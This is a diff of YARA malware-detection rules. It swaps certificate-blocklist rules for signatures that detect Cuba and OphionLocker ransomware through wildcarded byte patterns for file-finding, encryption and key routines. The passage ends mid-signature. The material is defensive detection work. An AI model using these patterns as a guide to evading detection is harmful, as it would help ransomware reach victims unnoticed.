 		author = "ReversingLabs"
-		id = "ce0b23fd-5f79-5b90-8d5c-2ff59ac39df6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b2c81849-9fa6-58b6-b6fe-4d9a5f0923ea"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4068-L4084"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "333c58a9af2d94604b637ab0a7280b6688a89ff73e30a93a8daed040fab7f620"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Cuba.yara#L1-L126"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0a8dea6e38a6407897b994ea119bc8b0712a94363b7b3942dcd32c65ee5548d4"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cuba"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPECTACLE IMAGE LTD" and pe.signatures [ i ] . serial == "09:3f:e6:3d:1a:5f:68:f1:4e:ca:ac:87:1a:03:f7:a3" and 1562716800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Bb26B7B6634D5Db548C437B5085B01C1 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "443a876a-dfd7-5a9e-bb15-a44a53363494"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4086-L4104"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58d574b196f84416eb04000205cd8f4817618003f2948bb0eb7d951c282ef6ff"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8B D7 8D 4D ?? E8 ??
+            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
+            0F B7 00 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
+            0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45
+            ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43
+            45 ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0
+            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D3 C6
+            45 ?? ?? 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
+            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 55 ??
+            8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 8B 5D ?? 83 FB ?? 8B 7D ?? 8B 45 ?? 0F
+            43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ??
+            83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9
+            ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ??
+            ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1
+        }
+		$find_files_p2 = {
+            66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ??
+            8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75
+            ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8
+            ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75
+            ?? EB ?? 83 7D ?? ?? 75 ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 FA ?? 0F 43 C1 66 83 38 ??
+            75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66
+            83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 74 ?? 8B 8D ?? ?? ?? ??
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? C6 45 ?? ?? 83 FB ?? 72 ?? 8D 0C 5D ??
+            ?? ?? ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 83 C0 ?? 83 F8 ?? 0F
+            87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
+            9D ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 55 ?? C7 45
+            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15
+        }
+		$enum_resources = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B DA 89 5D ?? 8D 45 ?? C7 45 ?? ?? ??
+            ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 32
+            C0 E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 66 90
+            FF 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 83 7E ?? ?? 0F 85
+            ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 56 ?? 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 58 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C3 8D 4D
+            ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8B CB C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ??
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? 8B D3 E8 ?? ?? ?? ?? 47
+            83 C6 ?? 3B 7D ?? 0F 82 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 7D ?? 0F 57 C0 66 0F 13 45 ??
+            C7 45 ?? ?? ?? ?? ?? 8B C7 83 7F ?? ?? 72 ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 75 ?? FF 15 ?? ??
+            ?? ?? 32 DB E9 ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74
+            ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8E ?? ?? ?? ?? 6A ?? 8D
+            41 ?? 50 6A ?? 8D 56 ?? 51 52 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 53 FF 15
+            ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 8D 45 ?? 8B CE
+            50 E8 ?? ?? ?? ?? EB ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 6A ?? EB ?? 6A ?? 8D
+            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 75 ?? 8A D8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 83
+            CE ?? 89 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 83 7F ?? ?? 72 ?? 8B 3F 50 57 FF 15 ?? ??
+            ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? CC CC CC 55 8B EC 83 E4 ?? 81 EC
+        }
+		$encrypt_files_p2 = {
+            A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B 5D ?? 56 57 8B F9 89 5C 24 ?? 6A ??
+            8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 8B 17 8B 47 ?? 2B C2 50 52 FF 33 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33
+            CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 44 24 ?? 8B 57 ?? 8B 0F 89 44 24 ?? 89 54 24
+            ?? 89 4C 24 ?? 85 C0 7E ?? 8B D8 8B 47 ?? 8B F3 2B 47 ?? 3B D8 52 0F 43 F0 8D 47 ??
+            56 51 50 E8 ?? ?? ?? ?? 56 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 2B DE
+            8B 54 24 ?? 03 CE 83 C4 ?? 89 4C 24 ?? 85 DB 7F ?? 8B 5C 24 ?? 6A ?? 6A ?? 0F 57 C0
+            66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 33 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
+            85 C0 75 ?? FF D6 89 43 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ??
+            89 44 24 ?? 8D 87 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 4C 24 ?? ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 89 43 ?? 6A ?? 8D 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF 37 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            FF D6 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? B0 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"IT Mott\"" and ( pe.signatures [ i ] . serial == "00:bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" or pe.signatures [ i ] . serial == "bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" ) and 1591919307 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_29128A56E7B3Bfb230742591Ac8B4718 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ophionlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects OphionLocker ransomware."
 		author = "ReversingLabs"
-		id = "b868d2f2-3852-57a3-be01-32cc16eb2ff7"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "75335749-66bd-539e-92b3-dd92c0b332d8"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4106-L4122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5a89fec015e56ddddaed75be91a87288dcd27841937d26e3416187913c4f0b85"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.OphionLocker.yara#L1-L105"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3c54a948a6a45ec5f5bc32fbbdbc8822f402b1332e9109b20b90635464dbe2ac"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "OphionLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" and 1590900909 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7Bfbfdfef43608730Ee14779Ee3Ee2Cb : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "fdc2f6a0-8fae-537e-812f-b0c292f76b1e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4124-L4140"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f8f233b78e9d3558b0cd7978e3c5fa32645a3bb706c6fdec7f1e4195cf513f10"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$ol_do_filetypes_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 33 DB 53 89 5D ?? 53 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+        }
+		$ol_do_filetypes_2 = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 89 5D ?? 50
+            8D 85 ?? ?? ?? ?? 89 5D ?? 50 53 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8
+            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 8D 75 ?? 50 E8 ?? ??
+            ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 58 89 45 ?? 89 5D ?? 88 5D ?? 89 45 ?? 89
+            5D ?? 88 5D ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 8B 39 E9 00 01 00 00 8B 77 ??
+            8D 47 ?? 89 45 ?? 3B 77 ?? 0F 84 EC 00 00 00 8B F8 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 50 8D 4D ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 4D
+        }
+		$ol_do_filetypes_3 = {
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ??
+            89 65 ?? 8D 45 ?? 83 EC ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ??
+            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 83 C4 ?? 3B 77 ?? 0F
+            85 1C FF FF FF 8B 4D ?? 8B 7D ?? 8B 3F 89 7D ?? 3B F9 0F 85 F5 FE FF FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
+            ?? ?? 8D 85 ?? ?? ?? ?? 89 65 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
+            CC E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 33 F6 8D 8D
+            ?? ?? ?? ?? 53 46 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 53 56 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$ol_ecies_key_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 8B F9 33 DB 89 5D ?? 8D 8D ?? ?? ?? ?? 89 7D ?? 89 5D ?? E8 ??
+            ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 46 8D 8D ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
+            CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 50 56 FF 75 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 0F 85 40 03 00 00 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B B4 05 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 50 8B 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 FF 56 ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BB ??
+            ?? ?? ?? 8D 4D ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 83 7D ?? ?? 8D 4D ?? 8B F0
